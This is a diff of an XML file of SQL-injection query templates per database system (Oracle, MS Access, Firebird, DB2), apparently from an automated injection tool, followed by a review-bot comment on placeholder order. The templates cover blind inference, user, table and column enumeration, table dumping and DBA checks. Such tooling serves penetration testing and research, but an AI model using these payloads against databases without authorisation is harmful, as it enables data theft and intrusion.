<inband query="SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
<inband query="SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
|
||||||
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND OWNER='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
|
||||||
</columns>
|
</columns>
|
||||||
<dump_table>
|
<dump_table>
|
||||||
<inband query="SELECT %s FROM %s"/>
|
<inband query="SELECT %s FROM %s"/>
|
||||||
|
@ -359,12 +359,12 @@
|
||||||
<substring query="MID((%s),%d,%d)"/>
|
<substring query="MID((%s),%d,%d)"/>
|
||||||
<concatenate query="%s&%s"/>
|
<concatenate query="%s&%s"/>
|
||||||
<case query="SELECT (IIF(%s,1,0))"/>
|
<case query="SELECT (IIF(%s,1,0))"/>
|
||||||
|
<inference query="ASCW(MID((%s),%d,1)) > %d"/>
|
||||||
<banner/>
|
<banner/>
|
||||||
<!--CURRENTUSER() is not available outside the MS Access query tool itself-->
|
<!--CURRENTUSER() is not available outside the MS Access query tool itself-->
|
||||||
<current_user/>
|
<current_user/>
|
||||||
<current_db/>
|
<current_db/>
|
||||||
<hostname/>
|
<hostname/>
|
||||||
<inference query="ASCW(MID((%s),%d,1)) > %d"/>
|
|
||||||
<is_dba/>
|
<is_dba/>
|
||||||
<dbs/>
|
<dbs/>
|
||||||
<!--MSysObjects have no read permission by default-->
|
<!--MSysObjects have no read permission by default-->
|
||||||
|
@ -401,16 +401,16 @@
|
||||||
<substring query="SUBSTRING((%s) FROM %d FOR %d)"/>
|
<substring query="SUBSTRING((%s) FROM %d FOR %d)"/>
|
||||||
<concatenate query="%s||%s"/>
|
<concatenate query="%s||%s"/>
|
||||||
<case query="SELECT IIF(%s,1,0)"/>
|
<case query="SELECT IIF(%s,1,0)"/>
|
||||||
|
<inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d" dbms_version=">=2.1" query2="SUBSTRING((%s) FROM %d FOR 1) > '%c'"/>
|
||||||
<banner query="SELECT RDB$GET_CONTEXT('SYSTEM','ENGINE_VERSION') FROM RDB$DATABASE" dbms_version=">=2.1"/>
|
<banner query="SELECT RDB$GET_CONTEXT('SYSTEM','ENGINE_VERSION') FROM RDB$DATABASE" dbms_version=">=2.1"/>
|
||||||
<current_user query="SELECT CURRENT_USER FROM RDB$DATABASE"/>
|
<current_user query="SELECT CURRENT_USER FROM RDB$DATABASE"/>
|
||||||
<current_db query="SELECT RDB$GET_CONTEXT('SYSTEM','DB_NAME') FROM RDB$DATABASE"/>
|
<current_db query="SELECT RDB$GET_CONTEXT('SYSTEM','DB_NAME') FROM RDB$DATABASE"/>
|
||||||
<hostname/>
|
<hostname/>
|
||||||
|
<is_dba query="CURRENT_USER='SYSDBA'"/>
|
||||||
<users>
|
<users>
|
||||||
<inband query="SELECT RDB$USER FROM RDB$USER_PRIVILEGES"/>
|
<inband query="SELECT RDB$USER FROM RDB$USER_PRIVILEGES"/>
|
||||||
<blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/>
|
<blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/>
|
||||||
</users>
|
</users>
|
||||||
<inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d" dbms_version=">=2.1" query2="SUBSTRING((%s) FROM %d FOR 1) > '%c'"/>
|
|
||||||
<is_dba query="CURRENT_USER='SYSDBA'"/>
|
|
||||||
<tables>
|
<tables>
|
||||||
<inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
|
<inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
|
||||||
<blind query="SELECT FIRST 1 SKIP %d RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)" count="SELECT COUNT(RDB$RELATION_NAME) FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
|
<blind query="SELECT FIRST 1 SKIP %d RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)" count="SELECT COUNT(RDB$RELATION_NAME) FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
|
||||||
|
@ -603,8 +603,8 @@
|
||||||
<blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS foobar WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
|
<blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS foobar WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
|
||||||
</tables>
|
</tables>
|
||||||
<columns>
|
<columns>
|
||||||
<inband query="SELECT name,RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s'" condition="name"/>
|
<inband query="SELECT name,RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
|
||||||
<blind query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s'" query2="SELECT RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s'" count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s'" condition="name"/>
|
<blind query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" query2="SELECT RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s' AND tbcreator='%s'" count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
|
||||||
</columns>
|
</columns>
|
||||||
<dump_table>
|
<dump_table>
|
||||||
<inband query="SELECT %s FROM %s"/>
|
<inband query="SELECT %s FROM %s"/>
|
||||||
|
|
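Review bot: The placeholder order in the changed `<columns>` templates differs between attributes, and nothing in the file records it. The Oracle ones gain an extra `%s` for `OWNER` and the DB2 ones for `tbcreator`: `query` and `count` now take (table, owner), while `query2` takes (table, column, owner). The code that fills these templates is not visible in this part of the page, so each call site should be checked to pass the owner value in that order; a caller still supplying the old number of arguments would fail at format time with a TypeError. A short XML comment above each `<columns>` element would help, e.g. `<!-- query/count: table, owner; query2: table, column, owner -->`. The `OWNER='%s'` comparison is also case-sensitive, so the caller presumably upper-cases the database name first (the live tests pass `sys` and expect `SYS`); that is worth confirming.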